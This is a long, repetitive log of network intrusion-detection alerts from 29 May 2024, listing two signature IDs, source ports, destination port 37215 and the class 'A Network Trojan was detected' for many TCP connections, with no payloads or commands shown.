                SID:2835222
                Source Port:45784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666523
                SID:2835222
                Source Port:45576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766890
                SID:2835222
                Source Port:42472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767063
                SID:2835222
                Source Port:49700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763342
                SID:2829579
                Source Port:42480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043947
                SID:2835222
                Source Port:42542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.734598
                SID:2829579
                Source Port:45814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237493
                SID:2835222
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436497
                SID:2829579
                Source Port:53628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762779
                SID:2835222
                Source Port:38926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461845
                SID:2835222
                Source Port:48364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369930
                SID:2835222
                Source Port:57710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.319331
                SID:2829579
                Source Port:54220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125146
                SID:2835222
                Source Port:52938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559670
                SID:2835222
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918299
                SID:2829579
                Source Port:44976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288172
                SID:2829579
                Source Port:47764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605197
                SID:2829579
                Source Port:43740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180268
                SID:2835222
                Source Port:45254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362925
                SID:2835222
                Source Port:49114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014782
                SID:2835222
                Source Port:33166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645152
                SID:2829579
                Source Port:47454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279255
                SID:2835222
                Source Port:36820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.711492
                SID:2829579
                Source Port:56756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060548
                SID:2829579
                Source Port:33702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041366
                SID:2835222
                Source Port:36798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421106
                SID:2835222
                Source Port:48476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557984
                SID:2829579
                Source Port:49728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883899
                SID:2835222
                Source Port:54662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224251
                SID:2835222
                Source Port:40708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231141
                SID:2835222
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735013
                SID:2829579
                Source Port:54954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869345
                SID:2829579
                Source Port:40370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514134
                SID:2835222
                Source Port:40818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.976029
                SID:2829579
                Source Port:51918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988889
                SID:2835222
                Source Port:45268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231362
                SID:2829579
                Source Port:60046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906415
                SID:2829579
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265778
                SID:2835222
                Source Port:52528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848771
                SID:2829579
                Source Port:53546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557170
                SID:2835222
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238966
                SID:2829579
                Source Port:34700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380276
                SID:2829579
                Source Port:46150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897631
                SID:2835222
                Source Port:50156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038518
                SID:2835222
                Source Port:53790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227889
                SID:2835222
                Source Port:35674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732848
                SID:2835222
                Source Port:36918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166455
                SID:2835222
                Source Port:57528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074960
                SID:2829579
                Source Port:54594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.531957
                SID:2835222
                Source Port:52884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.927888
                SID:2835222
                Source Port:55074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210897
                SID:2829579
                Source Port:42414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418372
                SID:2829579
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951580
                SID:2835222
                Source Port:53828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984859
                SID:2835222
                Source Port:44116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024778
                SID:2829579
                Source Port:36012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505087
                SID:2829579
                Source Port:36932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925726
                SID:2835222
                Source Port:37122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617202
                SID:2829579
                Source Port:44038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331434
                SID:2829579
                Source Port:59972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664218
                SID:2829579
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072340
                SID:2829579
                Source Port:56948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322126
                SID:2829579
                Source Port:60632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728348
                SID:2835222
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731832
                SID:2835222
                Source Port:41952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816986
                SID:2835222
                Source Port:50010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897505
                SID:2829579
                Source Port:44826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009755
                SID:2835222
                Source Port:44728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160336
                SID:2829579
                Source Port:60344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268496
                SID:2835222
                Source Port:52730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432541
                SID:2835222
                Source Port:55924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733432
                SID:2829579
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436506
                SID:2829579
                Source Port:41180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513716
                SID:2829579
                Source Port:41666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225535
                SID:2829579
                Source Port:54432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074765
                SID:2829579
                Source Port:34150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375071
                SID:2835222
                Source Port:47062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718801
                SID:2829579
                Source Port:42978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559990
                SID:2835222
                Source Port:46260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.027385
                SID:2835222
                Source Port:39744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169304
                SID:2829579
                Source Port:50624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712800
                SID:2835222
                Source Port:41008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521209
                SID:2835222
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613045
                SID:2835222
                Source Port:55296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060882
                SID:2835222
                Source Port:47280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369116
                SID:2829579
                Source Port:48246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287536
                SID:2829579
                Source Port:43920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209686
                SID:2829579
                Source Port:39930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573163
                SID:2835222
                Source Port:38014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794545
                SID:2829579
                Source Port:53304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261776
                SID:2829579
                Source Port:46276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896044
                SID:2835222
                Source Port:33824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262687
                SID:2835222
                Source Port:48626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072716
                SID:2829579
                Source Port:36750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.689082
                SID:2835222
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.025423
                SID:2835222
                Source Port:58452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023401
                SID:2829579
                Source Port:37360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.398769
                SID:2835222
                Source Port:45948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316565
                SID:2829579
                Source Port:46180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287811
                SID:2835222
                Source Port:39628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971783
                SID:2835222
                Source Port:50758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287255
                SID:2835222
                Source Port:40070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899053
                SID:2835222
                Source Port:39594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076585
                SID:2829579
                Source Port:48620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640462
                SID:2835222
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385182
                SID:2835222
                Source Port:44308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787182
                SID:2829579
                Source Port:45176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645705
                SID:2829579
                Source Port:57140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518848
                SID:2829579
                Source Port:47180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957924
                SID:2835222
                Source Port:51982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506141
                SID:2829579
                Source Port:58728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008946
                SID:2835222
                Source Port:56546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862531
                SID:2835222
                Source Port:42322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914004
                SID:2835222
                Source Port:50006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956296
                SID:2835222
                Source Port:42492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072528
                SID:2835222
                Source Port:54256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386174
                SID:2829579
                Source Port:56712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942710
                SID:2829579
                Source Port:45736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835877
                SID:2829579
                Source Port:57974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443132
                SID:2835222
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038577
                SID:2835222
                Source Port:46130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019915
                SID:2835222
                Source Port:47288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048238
                SID:2829579
                Source Port:35286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110661
                SID:2835222
                Source Port:47050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189755
                SID:2829579
                Source Port:38722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897748
                SID:2829579
                Source Port:49626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736959
                SID:2829579
                Source Port:60058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440005
                SID:2829579
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900204
                SID:2829579
                Source Port:59330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905024
                SID:2829579
                Source Port:45412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230928
                SID:2835222
                Source Port:47106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779554
                SID:2835222
                Source Port:39214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.980972
                SID:2835222
                Source Port:45170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239430
                SID:2829579
                Source Port:52474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265581
                SID:2829579
                Source Port:34362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802877
                SID:2829579
                Source Port:32934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321778
                SID:2829579
                Source Port:46116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586652
                SID:2835222
                Source Port:37486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369915
                SID:2835222
                Source Port:57482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025653
                SID:2829579
                Source Port:39852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842204
                SID:2829579
                Source Port:57196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832630
                SID:2835222
                Source Port:34290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266945
                SID:2835222
                Source Port:37980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511391
                SID:2829579
                Source Port:57430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.125506
                SID:2835222
                Source Port:49324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184877
                SID:2829579
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899380
                SID:2835222
                Source Port:45932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976403
                SID:2829579
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364706
                SID:2829579
                Source Port:33796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261702
                SID:2835222
                Source Port:42570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557119
                SID:2835222
                Source Port:36344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732408
                SID:2829579
                Source Port:46554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584364
                SID:2835222
                Source Port:32948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905459
                SID:2835222
                Source Port:46904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165421
                SID:2829579
                Source Port:40026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.571945
                SID:2835222
                Source Port:34840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037423
                SID:2829579
                Source Port:45308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066689
                SID:2835222
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443347
                SID:2829579
                Source Port:45370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638983
                SID:2835222
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.911154
                SID:2829579
                Source Port:55108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287556
                SID:2835222
                Source Port:56446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883675
                SID:2829579
                Source Port:40544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928618
                SID:2829579
                Source Port:39056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983259
                SID:2835222
                Source Port:52286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860273
                SID:2835222
                Source Port:34726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462262
                SID:2835222
                Source Port:34368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848858
                SID:2829579
                Source Port:36828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236470
                SID:2829579
                Source Port:41736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711948
                SID:2835222
                Source Port:55978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222075
                SID:2829579
                Source Port:33614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734315
                SID:2829579
                Source Port:34350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668789
                SID:2829579
                Source Port:45428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587575
                SID:2835222
                Source Port:45508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449336
                SID:2835222
                Source Port:45846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584149
                SID:2835222
                Source Port:57816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100550
                SID:2829579
                Source Port:49758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869457
                SID:2829579
                Source Port:49356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868887
                SID:2829579
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899070
                SID:2835222
                Source Port:59576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887545
                SID:2835222
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848852
                SID:2835222
                Source Port:39928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324372
                SID:2835222
                Source Port:48862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617191
                SID:2835222
                Source Port:37260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839101
                SID:2829579
                Source Port:45054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738560
                SID:2835222
                Source Port:42186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652132
                SID:2829579
                Source Port:46988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277743
                SID:2829579
                Source Port:54534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947736
                SID:2835222
                Source Port:55744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901210
                SID:2829579
                Source Port:50686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.548650
                SID:2829579
                Source Port:33344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827305
                SID:2829579
                Source Port:44894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.167441
                SID:2835222
                Source Port:42078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073755
                SID:2835222
                Source Port:56352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136013
                SID:2829579
                Source Port:36520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717305
                SID:2829579
                Source Port:51834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025489
                SID:2835222
                Source Port:53292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947591
                SID:2829579
                Source Port:37180
                Destination Port:37215
